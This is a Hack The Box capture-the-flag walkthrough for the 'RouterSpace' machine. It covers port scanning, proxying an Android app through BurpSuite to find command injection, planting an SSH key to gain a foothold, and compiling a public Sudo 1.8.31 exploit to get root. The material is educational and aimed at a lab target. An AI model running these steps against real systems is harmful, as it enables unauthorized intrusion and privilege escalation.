---
sidebar_label: 🌠 RouterSpace
description: ''
last_update:
  date: 2022/07/11
  author: Raúl Sánchez
tags:
  - adb
  - anbox
  - apk
  - BurpSuite
  - SUID
  - Sudo exploit
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# RouterSpace

![](routerspace1.png)

> A very interesting easy machine where it costs more to set up the environment than to compromise it.

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## Setting-up the Environment

First of all, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the IP address and hostname of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which htb
htb: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.148
[?] Type the name of the box: RouterSpace

[!] Hack The Box Machine
10.10.11.148 RouterSpace.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.148              

[!] Working directory created
[!] Initial configuration completed
```

### Parrot OS

In this case we will use [Parrot OS](https://parrotlinux.org/) to solve this machine. First, we need to install [adb](https://developer.android.com/studio/command-line/adb) and [snapd](https://snapcraft.io/).

```bash
sudo apt install adb snapd
```

After that, we can install [anbox](https://docs.anbox.io/userguide/install.html#install-the-anbox-snap).

```bash
snap install --devmode --beta anbox
```

Then, It's recommended to restart the computer to continue.

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 routerspace.htb
PING RouterSpace.htb (10.10.11.148) 56(84) bytes of data.
64 bytes from RouterSpace.htb (10.10.11.148): icmp_seq=1 ttl=63 time=52.7 ms

--- RouterSpace.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 52.710/52.710/52.710/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py routerspace.htb

routerspace.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port \[0-65535].
* [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
* [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
* [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
* [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
* [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* {name}.htb : Target machine.
* [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
* allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn routerspace.htb -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 16:48 CEST
Initiating SYN Stealth Scan at 16:48
Scanning routerspace.htb (10.10.11.148) [65535 ports]
Discovered open port 22/tcp on 10.10.11.148
Discovered open port 80/tcp on 10.10.11.148
Completed SYN Stealth Scan at 16:49, 26.60s elapsed (65535 total ports)
Nmap scan report for routerspace.htb (10.10.11.148)
Host is up, received user-set (0.11s latency).
Scanned at 2022-07-10 16:48:51 CEST for 27s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.71 seconds
           Raw packets sent: 131087 (5.768MB) | Rcvd: 23 (1.012KB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.148
    [*] Open ports:  22,80

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
* {name}.htb : Target machine.
* [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
* targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,80 routerspace.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 16:49 CEST
Nmap scan report for routerspace.htb (10.10.11.148)
Host is up (0.047s latency).
rDNS record for 10.10.11.148: RouterSpace.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-64208
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 69
|     ETag: W/"45-dG/bV0Fk6WEmWkvVYrj9Q1o+2DE"
|     Date: Sun, 10 Jul 2022 14:49:49 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: ICJh iUjP QP3 Mgm }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-25159
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Sun, 10 Jul 2022 14:49:49 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-70012
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Sun, 10 Jul 2022 14:49:49 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

As we see, there are open two ports, SSH and HTTP server.

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::

### 1.2 Web

Using [whatweb](https://morningstarsecurity.com/research/whatweb) we can scan the technology stack that powers a website.

```python
❯ whatweb http://10.10.11.148
http://10.10.11.148 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, IP[10.10.11.148], JQuery[1.12.4], Modernizr[3.5.0.min], Script, Title[RouterSpace], UncommonHeaders[x-cdn], X-Powered-By[RouterSpace], X-UA-Compatible[ie=edge]
```

Then, search for the page in the browser and download the `apk` file.

![Download the apk file.](routerspace2.png)

### 1.3 Install the apk

Start **Anbox Application Manager** and type this command to install it.

```bash
❯ adb install RouterSpace.apk
* daemon not running; starting now at tcp:5037
* daemon started successfully
Performing Streamed Install
Success
```

Now we can see the application installed.

![RouterSpace Installed](routerspace3.png)

Then, we will see there is no configured proxy.

```bash
❯ adb shell settings list global http_proxy | grep proxy
```

So we are going to set up a new proxy in our `tun0` address with `BurpSuite`

```bash
❯ adb shell settings put global http_proxy 10.10.14.64:8001
```

Now we will see there is a configured proxy on the application.

```bash
❯ adb shell settings list global http_proxy | grep proxy
global_http_proxy_exclusion_list=
global_http_proxy_host=10.10.14.64
global_http_proxy_port=8001
global_proxy_pac_url=
http_proxy=10.10.14.64:8001
```

In `BurpSuite` add a new proxy listener.

![Custom Proxy Listener](routerspace4.png)

## 2. Foothold

Start the application and listen the connection with `Burpsuite`.

![Check Status](routerspace5.png)

If we press the button we can see the **HTTP request**.

![Intercepted Request](routerspace6.png)

Using the repeater we see that we can execute shell commands and find the user `paul`.

![User paul](routerspace7.png)

Then, we can list the files and folders of the user `paul` and we find the `.ssh` folder.

![User paul](routerspace8.png)

The plan now is to create a new **ssh key** and insert it on the target to gain access with the user `paul`. So first, create a new ssh key.

```bash
❯ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:J96MJEsswbCOOxFLfk4VNkJMJy0+7iI7G6ukQuYxVWI root@parrot
The key's randomart image is:
+---[RSA 3072]----+
|  ==.=           |
|   E=oo          |
|..+ *.           |
|o= +.o           |
|+.+oo + S .      |
| B+. o = *       |
|B.+.  . o o      |
|** .             |
|X+.              |
+----[SHA256]-----+
```

Then copy your public key.

```bash
❯ cat id_rsa.pub 
ssh-rsa <PUBLIC_SSH_KEY> root@parrot
```

Insert the public key in the `authorized_keys` file of the target using `BurpSuite` .

![](routerspace9.png)

Now we can connect to the target via `ssh` using the user `paul` and see the user flag.

```bash
❯ ssh paul@10.10.11.148
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 10 Jul 2022 09:27:03 PM UTC

  System load:  0.0               Processes:             216
  Usage of /:   72.7% of 3.49GB   Users logged in:       0
  Memory usage: 35%               IPv4 address for eth0: 10.10.11.148
  Swap usage:   0%


80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Jul 10 08:32:21 2022 from 10.10.14.117

paul@routerspace:~$ cat user.txt
```

## 2.1 Sudo exploit

First, we are going to find all [SUID binaries](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid). Check it using:

```bash
paul@routerspace:~$ sudo -l
[sudo] password for paul: 
paul@routerspace:~$ cd /
paul@routerspace:/$ find \-perm -4000 2>/dev/null
./usr/bin/su
./usr/bin/passwd
./usr/bin/at
./usr/bin/chsh
./usr/bin/chfn
./usr/bin/mount
./usr/bin/newgrp
./usr/bin/umount
./usr/bin/sudo
./usr/bin/gpasswd
./usr/bin/fusermount
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/eject/dmcrypt-get-device
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/openssh/ssh-keysign
```

Mmm... we see `./usr/bin/sudo` , which version is `sudo` using?

```bash
paul@routerspace:/$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
```

In a quick search we can find this [exploit](https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit) to this `sudo` version. But we see that this files have been already downloaded on the machine.

```bash
paul@routerspace:/$ cd home/paul/
paul@routerspace:~$ ls
Makefile  exploit.c  libnss_x     shellcode.c  test.py
exploit   libnss_X   linkpase.sh  snap         user.txt
```

We could execute the **exploit** now, but instead we are going to compile again.

```bash
paul@routerspace:~$ mkdir cve
paul@routerspace:~$ mv Makefile cve/
paul@routerspace:~$ mv exploit.c cve/
paul@routerspace:~$ mv shellcode.c cve/
```

Follow the instructions in order to make the **exploit** file.

```bash
paul@routerspace:~$ cd cve/
paul@routerspace:~/cve$ ls
Makefile  exploit.c  shellcode.c
paul@routerspace:~/cve$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
```

Finally, execute the exploit to get `root` access and get the `root` flag.

```bash
paul@routerspace:~/cve$ ./exploit
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
```

I hope you made it too, see you next timee! 🙃
